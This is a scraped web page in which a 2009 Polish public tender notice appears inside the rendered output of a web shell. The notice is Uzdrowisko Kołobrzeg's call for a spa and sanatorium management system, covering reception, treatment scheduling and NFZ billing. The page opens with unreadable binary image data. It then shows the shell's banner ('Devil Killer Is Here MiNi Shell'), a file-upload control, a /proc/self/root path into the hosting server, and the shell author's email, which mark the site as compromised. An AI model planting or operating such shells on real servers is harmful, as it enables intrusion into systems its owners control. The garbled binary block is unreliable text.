JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090401/57075-N-2009.html

<p class="kh_header"><b>Kołobrzeg: Dostawa oprogramowania oraz wdrożenie i uruchomienie systemu informatycznego dla Uzdrowisko Kołobrzeg S.A.</b><br>
<b>Numer ogłoszenia: 57075 - 2009; data zamieszczenia: 01.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uzdrowisko Kołobrzeg Spółka Akcyjna , ks. Piotra Ściegiennego 1, 78-100 Kołobrzeg, woj. zachodniopomorskie, tel. 094 3548802, faks 0-94 35 225 16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uzdrowisko.kolobrzeg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa oprogramowania oraz wdrożenie i uruchomienie systemu informatycznego dla Uzdrowisko Kołobrzeg S.A..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje dostawę oprogramowania oraz wdrożenie i uruchomienie systemu informatycznego dla potrzeb  Uzdrowisko Kołobrzeg Spółka Akcyjna, którego poszczególne elementy wyspecyfikowano poniżej:
1.	Zakres zamówienia, podstawowe składniki funkcjonalne Systemu Zarządzania Uzdrowiskami i Sanatoriami
2.	Przeprowadzenie analizy przedwdrożeniowej, ustalenie harmonogramu wdrożenia, dostarczenie licencji i wdrożenie systemu informatycznego, oprogramowania oraz wszystkich licencji niezbędnych do funkcjonowania systemu informatycznego.
3.	Zamawiający wymaga uwzględnienia w cenie oferty płatności za całość zamówienia w  12 miesięcznych ratach.
4.	Wykonawca dostarczy i zainstaluje oprogramowanie na własny koszt;
5.	Wykonawca skonfiguruje i przystosuje wdrażany system do specyfiki pracy zamawiającego;
6.	Wykonawca przeszkoli użytkowników w zakresie umożliwiającym samodzielną obsługę systemu, zgodnie z przedstawionym przez wykonawcę harmonogramem;
7.	Wykonawca przeszkoli co najmniej 2 administratorów systemu w stopniu umożliwiającym samodzielną eksploatację, konfigurację wdrażanego systemu;
8.	Wykonawca przeniesie wszystkie z możliwych dane, niezbędne do prawidłowego działania nowego systemu a rejestrowane w starych systemach.
9.	Zamawiający określa następujący termin wykonania zamówienia: 30.04.2009 r.



Wymagania wstępne
Oferent powinien posiadać niezbędną do zrealizowania zamówienia wiedzę i doświadczenie udokumentowane co najmniej trzema wdrożeniami podobnych systemów w obiektach uzdrowiskowych, sanatoryjnych.
Oprogramowanie po stronie klienta powinno działać pod kontrolą Windows XP lub Vista
Oprogramowanie powinno umożliwiać stabilną pracę w sieci rozległej na bazie danych przyrastającej o ok. milion rekordów rocznie


Oprogramowanie powinno spełniać następujące wymogi

A.W ZAKRESIE OBSŁUGI RECEPCJI 
prezentować dane dotyczące rezerwacji i meldunków na grafiku przystosowanym do obsługi sanatoriów (podział na miejsca w pokojach, oddzielne zestawy kolorów dla dowolnej ilości grup klientów); na grafiku powinny znajdować się opisy pozwalające na identyfikację widocznych meldunków i rezerwacji
umożliwiać zmianę statusu klienta w trakcie pobytu (np. pobyt hotelowy 1 dzień, później turnus rehabilitacyjny a na końcu pakiet SPA)
umożliwiać dokonanie i zmianę rezerwacji dowolnej ilości miejsc (łóżek) także z możliwością zaznaczenia przejścia pomiędzy pokojami (pokoje mogą znajdować się w różnych obiektach) w trakcie pobytu 
umożliwiać generowanie potwierdzenia rezerwacji w kształcie definiowanym przez użytkownika, zapisywanie go w formacie PDF, drukowanie bądź wysyłanie jako załącznik do e-maila bez konieczności korzystania z zewnętrznego oprogramowania; treść potwierdzenia powinna zawierać informacje o szczegółach wyliczenia ceny 
umożliwiać zameldowanie na podstawie rezerwacji lub bez niej, zmianę danych i usunięcie meldunku - zameldowanie może być dokonane z wybraniem pokoju bądź dyżurki pielęgniarskiej (w takim przypadku pokój przydziela pielęgniarka)
umożliwiać zameldowanie na dostawkę lub na wyłączność w danym pokoju	
umożliwiać dodanie, zmianę oraz usunięcie absencji wraz z informacją o jej przyczynach
umożliwiać wyszukiwanie, sortowanie, filtrowanie i grupowanie meldunków wg dowolnych kryteriów zawierających dane pacjenta, rezerwacji, meldunku oraz poziomu lojalności; umożliwiać wydrukowanie oraz wyeksportowanie do formatu zgodnego z MS Excel, XML i CSV tak przygotowanych danych;
posiadać możliwość pracy na dowolnej ilości obiektów z określeniem uprawnień użytkownika do przeglądania i zmiany danych dla każdego obiektu z osobna;
kontrolować ilość wolnych miejsc w pokojach przy tworzeniu i zmianach rezerwacji, także w przypadku rezerwacji z przejściem pomiędzy pokojami; ilość miejsc w pokojach może się zmieniać w czasie (np. podczas wakacji pokoje 3-osobowe mogą być zamieniane na 2-osobowe)
wszystkie wymienione w tym module operacje powinno dać się wykonać na grafiku;
umożliwiać szybkie zawężenie przeglądanego fragmentu grafiku do określonego budynku, pokoi o określonym standardzie i cechach szczególnych (np. posiadanie balkonu, widok z okna, piętro, ilość miejsc etc.)
umożliwiać planowanie wizyty u lekarza;
umożliwiać wprowadzenie preferencji pacjenta dotyczących planowania zabiegów
umożliwia wprowadzenie zamawianego wyżywienia z wykorzystaniem dowolnej ilości zestawów posiłków
pobierać dane z Systemu Rozliczeń Uzdrowisk NFZ

B.W ZAKRESIE OBSŁUGI SPRZEDAŻY
poprawnie wystawiać faktury zaliczkowe, końcowe, korygujące oraz paragony i dokumenty kasowe
automatycznie wyliczać cenę pobytu klienta korzystając z dowolnej ilości cenników zmieniających się w zależności od terminu pobytu, grupy do której należy klient, standardu pokoju, rabatu wynikającego z poziomu lojalności klienta; podczas wyliczeń program powinien uwzględniać różną stawkę VAT na pobyty lecznicze i hotelowe; wyliczenia powinny być poprawne również przy pobytach kombinowanych (np. 7 dni pobyt hotelowy + 14 dni pakiet leczniczy + dodatkowe posiłki)

C. W ZAKRESIE OBSŁUGI REZERWACJI/MARKETINGU
umożliwiać wprowadzenie rezerwacji indywidualnych i grupowych (system automatycznie rozpoznaje rezerwacje grupowe i nadaje numery)
rezerwowanie poszczególnych łóżek w pokojach, a także całych pokoi jednocześnie w różnych budynkach;
posiadać graficzną reprezentację bazy hotelowej (grafik bazy hotelowej); grafik powinien umożliwiać wykonanie wszystkich operacji opisanych w tym module, każda grupa pacjentów powinna być odznaczona innym kolorem, na grafiku powinny znajdować się opisy umożliwiające szybką identyfikację rezerwacji;
umożliwiać szybkie zawężenie przeglądanego fragmentu grafiku do określonego budynku, pokoi o określonym standardzie i cechach szczególnych (np. posiadanie balkonu, widok z okna, piętro, ilość miejsc etc.)
posiadać narzędzie do szybkiego wyszukiwania wolnych pokoi i łóżek;
automatycznie wyliczać wartość pobytu na podstawie wprowadzonych cenników, różne cenniki mogą obowiązywać dla różnych okresów czasowych i grup pacjentów;
posiadać możliwość potwierdzania rezerwacji z jednoczesnym wydrukiem faktury zaliczkowej;
umożliwiać wydrukowanie potwierdzenia rezerwacji lub umowy
rezerwacje mogą odbywać się przy pomocy interfejsu tradycyjnego i graficznego; graficzny interfejs umożliwia podgląd wielu budynków jednocześnie;
posiadać narzędzie umożliwiające szybkie wyszukiwanie wolnych pokoi i łóżek w podanym okresie dla podanej płci, wolne pokoje można filtrować wg standardu, piętra, budynku, ilości miejsc i dowolnych innych parametrów (np. wg wyposażenia);
rezerwacje można wyszukiwać, sortować, filtrować i grupować wg rezerwującego, statusu rezerwacji, grupy klientów, pokoju, budynku, numeru rezerwacji, poziomu lojalności rezerwującego, ilości wcześniejszych przyjazdów, wyżywienia, terminów przyjazdu i wyjazdu oraz dokonania rezerwacji;
rezerwacje mogą być przypisane i następnie rozliczane w ramach dowolnej ilości umów zawieranych z płatnikami;
rezerwacje mogą być przypisane do turnusów;
umożliwiać dokonywanie rezerwacji z przejściem pomiędzy pokojami, a także ze zmianą rodzaju pobytu (grupy klientów) w jego trakcie

D. W ZAKRESIE PLANOWANIA ZABIEGÓW
umożliwiać wyszukiwanie, sortowanie, filtrowanie i grupowanie pacjentów i kuracji wg nazwiska i imienia, statusu pobytu, grupy klientów, pokoju, budynku, numeru rezerwacji, terminów rozpoczęcia i zakończenia kuracji, lekarza prowadzącego, płatnika;

umożliwiać planowanie automatyczne - poprzez planowanie automatyczne rozumie się takie przypisanie przez system terminów i miejsc wykonania zabiegów, które spełniają wszystkie wymienione poniżej zasady planowania w sposób taki, że nie jest możliwe w żadnym wypadku ręczne ułożenie planu w sposób lepiej spełniający te zasady;
korzystać z ordynacji zabiegów dokonanej przez lekarza lub umożliwiać wprowadzenie ordynacji przez osobę planującą zabiegi;
umożliwiać szybką zmianę planu zabiegów i doplanowania dodatkowych w sposób automatyczny i ręczny;
planować zabiegi z priorytetowym uwzględnieniem stanowisk zabiegowych z budynku, w którym zameldowany jest pacjent;
umożliwiać podczas planowania przestrzeganie zasad: wykluczeń zabiegów (nie mogących się odbyć jednego dnia), następstw zabiegów (wymuszających kolejność wykonania zabiegów), interakcji pomiędzy zabiegami (określającymi minimalne i maksymalne przerwy  pomiędzy grupami zabiegów), karencję po zabiegach (określającą minimalny czas odpoczynku po zabiegu), czasy przejścia pomiędzy budynkami i piętrami w budynku, stopień sprawności pacjenta (dłuższe przerwy pomiędzy zabiegami dla osób która mają kłopoty z poruszaniem się);
umożliwiać zdefiniowanie dowolnych terminów rozpoczęcia wykonywania zabiegów dla każdego stanowiska zabiegowego, różnych dla każdego dnia tygodnia i dla każdej płci;
umożliwiać dowolne określenie czasu trwania zabiegu - czas ten może być krótszy lub dłuższy niż ten wynikający z przerwy pomiędzy kolejnymi terminami rozpoczęcia zabiegu;
umożliwiać planowanie kilku rodzajów zabiegów o różnym czasie trwania na jednym stanowisku zabiegowym;
mieć możliwość automatycznego włączania dodatkowych terminów w momencie, gdy skończą się te z puli podstawowej (np. po wyczerpaniu miejsc program powinien zacząć planować podczas posiłków lub na drugiej zmianie);
umożliwiać efektywne wykorzystanie miejsc na stanowiskach zabiegowych (planowanie jak najbliżej rana) i maksymalne możliwe ułatwienie korzystania z zabiegów dla pacjentów (planowanie z minimalnymi dopuszczalnymi przerwami); 
umożliwiać wymuszenie wyboru stanowiska zabiegowego lub planowanie na dowolnym stanowisku wykonującym dany zabieg;
umożliwiać wprowadzenia przerw w wykonywaniu zabiegów zarówno w czasie dnia, jak i w dłuższym okresie (np. przerwa na czyszczenie kabiny, posiłek wykonującego zabiegi, wolne soboty, urlopy); 
umożliwiać drukowanie kilku rodzajów planów zabiegów, także w językach obcych;
umożliwiać ewidencję wykonania zabiegów przez osobę wykonującą;
system powinien mieć możliwość automatycznego uruchamiania planowania zabiegów po zakończeniu wizyty u lekarza (osoba planująca zabiegi wprowadza tylko zmiany w planie, jeśli takie nastąpią w trakcie kuracji);
umożliwiać przeglądanie, wyszukiwanie, sortowanie, filtrowanie,  grupowanie wszystkich osób korzystających z kuracji (także ambulatoryjnych) wg nazwiska i imienia, danych adresowych pacjenta, grupy do której pacjent należy, okresu kuracji, lekarza prowadzącego etc.
umożliwiać wydrukowanie oraz wyeksportowanie do formatu zgodnego z MS Excel, XML i CSV tak przygotowanych danych;
umożliwiać dostęp do kartoteki medycznej pacjenta
umożliwiać kontrolę zajętości bazy zabiegowej oraz rzeczywisty czas pracy osób wykonujących zabiegi

E. W ZAKRESIE OBSŁUGI DYŻURKI PIELĘGNIARSKIEJ
umożliwiać wyszukiwanie, sortowanie, filtrowanie i grupowanie pacjentów i kuracji wg nazwiska i imienia, statusu pobytu, grupy klientów, pokoju, budynku, numeru rezerwacji, terminów rozpoczęcia i zakończenia kuracji, lekarza prowadzącego, kontraktu, płatnika;
umożliwiać korzystanie z danych kuracjusza wprowadzonych na recepcji, 
możliwość zmiany niektórych danych (np. przydzielony pokój, lekarz, uwagi etc.);
umożliwiać wprowadzenie absencji
umożliwiać przydzielenie lekarza prowadzącego i rezerwację wizyt z uwzględnieniem harmonogramu pracy każdego z gabinetów (rezerwacji można dokonać również na recepcji) - program podpowiada wolne terminy;
umożliwiać wprowadzanie wywiadu wstępnego, dolegliwości, badań, rozpoznania, przepisanych zabiegów i leków;
umożliwiać wykorzystywanie szablonów w celu usprawnienia wprowadzania danych
umożliwiać drukowanie dokumentacji medycznej zgodnej z przepisami prawa 
umożliwiać automatyczne generowanie epikryzy;
dawać możliwość uruchamiania automatycznego planowania przepisanych zabiegów;
umożliwiać wprowadzanie dowolnej ilości rozpoznań
podgląd zaplanowanych wizyt w formie kalendarza, możliwość wydruku harmonogramu wizyt w formie kalendarza;
synchronizacja terminarza wizyt z terminarzem w MS Outlook i w telefonie komórkowym;

F. W ZAKRESIE OBSŁUGI GABINETU LEKARSKIEGO

umożliwiać wyszukiwanie, sortowanie, filtrowanie i grupowanie pacjentów i kuracji wg nazwiska i imienia, statusu pobytu, grupy klientów, pokoju, budynku, numeru rezerwacji, terminów rozpoczęcia i zakończenia kuracji, lekarza prowadzącego, kontraktu, płatnika;
umożliwiać korzystanie z danych kuracjusza wprowadzonych na recepcji i w dyżurce pielęgniarek;
umożliwiać ustalanie harmonogramu pracy każdego z gabinetów;
umożliwiać wprowadzanie wywiadu wstępnego, dolegliwości, badań, rozpoznania, przepisanych zabiegów i leków oraz diety;
umożliwiać wykorzystywanie szablonów w celu usprawnienia wprowadzania danych, szablony są przypisane do każdego z lekarzy; 
umożliwiać drukowanie dokumentacji medycznej zgodnej z przepisami prawa 
umożliwiać automatyczne generowanie epikryzy;
dawać możliwość uruchamiania automatycznego planowania przepisanych zabiegów;
umożliwiać wprowadzanie dowolnej ilości rozpoznań;
podgląd zaplanowanych wizyt w formie kalendarza, możliwość wydruku harmonogramu wizyt w formie kalendarza;
podgląd dostępności ordynowanych zabiegów wraz z uwzględnieniem limitów dla poszczególnych lekarzy oraz dostępności zabiegów dla grup pacjentów;
automatyczne generowanie harmonogramu wizyt kontrolnych
synchronizacja terminarza wizyt z terminarzem w MS Outlook i w telefonie komórkowym;

G. W ZAKRESIE WSPOMAGANIA ROZLICZEŃ Z PŁATNIKAMI
umożliwiać pobieranie danych z internetowego Systemu Rozliczeń Uzdrowisk NFZ
umożliwiać automatyczne eksportowanie kompletnych danych do Systemu Rozliczeń Uzdrowisk NFZ
obsługiwać zwrot kosztów podróży dla ZUS, drukować statystyki dla ZUS i załączniki do faktur dla ZUS
obsługiwać zwrot kosztów podróży dla KRUS, drukować załączniki do faktur dla KRUS
drukować informacje o przebiegu rehabilitacji dla pacjentów z dofinansowaniem z PCPR
generować komunikaty XML w formacie określonym przepisami prawa oraz zarządzeniami Prezesa NFZ w zakresie kolejek oczekujących, wykonanych procedur, porad oraz hospitalizacji

H. W ZAKRESIE RAPORTÓW I ANALIZ
umożliwiać tworzenie dowolnych raportów na podstawie zgromadzonych w systemie danych przy pomocy wbudowanego narzędzia
umożliwiać  przypisanie poszczególnych raportów do użytkownika
szybki podgląd wydruku w oknie programu
eksport wydruków do wielu formatów: MS Excel, HTML, xml, tekst
możliwość tworzenia zestawień z grupowaniem i podsumowywaniem w grupach
możliwość tworzenia raportów w formie wykresów
możliwość tworzenia raportów w formie tabel przestawnych
możliwość wyszukiwania, sortowania, grupowania i filtrowania danych na wygenerowanym zestawieniu
możliwość formatowania raportów (zmiany kolorów, czcionki etc.)

    
Warunki jakie powinno spełniać oprogramowanie:
serwer bazy SQL
możliwość zarządzania bazą i danymi bazy przez administratora bezpośrednio z programu
wszystkie moduły muszą być autorstwa jednej firmy dostarczającej oprogramowanie
baza systemu informacyjnego winna zostać osadzona na serwerach obecnie zainstalowanych w siedzibie Zamawiającego
posiada narzędzia do szybkiego tworzenia wydruków i zestawień, zestawienia mają możliwość dowolnego sortowania, grupowania i podsumowywania danych, mogą być drukowane lub eksportowane do formatu zgodnego z MS Excel, tekstowego, XML, HTML, narzędzie tworzy również zestawienia w formie wykresów.
System jest w polskiej wersji językowej i posiada dokumentację w języku polskim
System umożliwia szyfrowanie danych zawartych w bazie
System posiada interfejs użytkownika pozwalający na dowolne wyszukiwanie, sortowanie, filtrowanie i grupowanie wszystkich widocznych danych, wybór widocznych kolumn i ustawienie dowolnej ich kolejności oraz drukowanie prezentowanych danych lub ich eksport do formatu MS Excel, XML, HTML i tekstowego
możliwość współpracy z dowolną drukarką fiskalną, centralą telefoniczną oraz systemem zamków elektronicznych, kartami elektronicznymi przystosowanymi do współpracy z zewnętrznymi systemami informatycznymi pracującymi na MS Windows
System jest przystosowany do obsługi wielu budynków

Ilości licencji 

Stanowisko	Ilość stanowisk
Recepcja i rezerwacja 	11
Sprzedaż 	11
Rozliczenia 	2
Dyżurka pielęgniarska 	12
Planowanie zabiegów 	6
Gabinet lekarski 	10
Raporty  - kierownicy obiektów, dział ekonomiczny, punkty żywienia + 1 w planowaniu zabiegów oraz 1 w marketingu	11
Dostęp do odczytu do wszystkich modułów dla Zarządu Spółki	4
Razem	67


WYMAGANIA DOTYCZĄCE SERWISU
czas reakcji na zgłoszenie zapotrzebowania na pomoc techniczną - do 6 godzin od zgłoszenia, system przyjmowania zgłoszeń musi działać skutecznie 7 dni w tygodniu, 24 godziny na dobę
poprzez reakcję rozumie się rozpoczęcie interwencji celem rozwiązania problemu,  interwencja może być zdalna, bądź w razie potrzeby lub na życzenie zamawiającego w siedzibie Klienta
aktualizacja wszystkich zakupionych modułów (co najmniej co 3 miesiące lub w przypadku zmiany przepisów prawa)
dodatkowe szkolenie z nowych rozwiązań w oprogramowaniu wynikających z aktualizacji
bezpłatne tworzenie raportów i statystyk

WYMAGANIA DOTYCZĄCE WDROŻENIA
wdrożenie odbywa się w siedzibie zamawiającego i polega na:
zainstalowaniu oprogramowania na wszystkich wskazanych stanowiskach
wprowadzeniu danych niezbędnych do uruchomienia programu
dostosowaniu wydruków i raportów do potrzeb zamawiającego
dostosowaniu eksportu danych księgowych do wymagań zamawiającego
szkoleniu obsługi w wymiarze co najmniej 40 godzin
stałej obecności wykwalifikowanego pracownika wykonawcy u zamawiającego przez okres co najmniej 8 dni.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 48.61.00.00-7, 48.99.00.00-4, 48.31.00.00-4, 48.48.10.00-3, 48.18.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Posiadanie uprawnień do wykonywania określonej działalności lub czynności oraz nie podleganie  wykluczeniu na podstawie art. 24 ustawy:
2.	Spełnienie warunków art. 22 ust. 1 prawa zamówień publicznych.
3.	Nie podleganie wykluczeniu na podst. art. 24 ust. 1 i 2 ustawy prawo zamówień publicznych
4.	Posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia:

Zamawiający będzie dokonywał oceny spełniania tych warunków na podstawie oświadczeń i dokumentów dostarczonych zgodnie z p-ktem VI specyfikacji. Zamawiający wymaga spełnienia wszystkich tych warunków.
Ocena warunków wymaganych od oferentów zostanie dokonana według formuły spełnia - nie spełnia. Niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem oferenta..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A.	Zamawiający określa następujące oświadczenia i dokumenty,  jakie mają dostarczyć wykonawcy:
1.	Oświadczenie o spełnieniu warunków art. 22 ust. 1 prawa zamówień publicznych - załącznik nr 2;
2.	Aktualny odpis z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż   6 miesięcy przed upływem terminu składania ofert.

B. Pozostałe oświadczenia i dokumenty, jakie mają dostarczyć wykonawcy:
1.	Wypełniony formularz ofertowy - załącznik nr 1.	
2.	Wykaz minimum 3 dostaw i wdrożeń w zakresie objętym przedmiotem zamówienia wykonanych w ostatnich 3 latach przed terminem wyznaczonym na składanie ofert potwierdzonych referencjami lub protokołami z wdrożeń przez zamawiających u których były świadczone wykazane usługi (wdrożenia w obiektach uzdrowiskowych, sanatoryjnych).
3.	Harmonogram płatności ratalnej - 12 miesięcznych rat..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.uzdrowisko.kolobrzeg.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uzdrowisko Kołobrzeg S.A.
ul. Ściegiennego 1
78-100 Kołobrzeg.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.04.2009 godzina 10:00, miejsce: Uzdrowisko Kołobrzeg S.A.
ul. Ściegiennego 1
78-100 Kołobrzeg.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com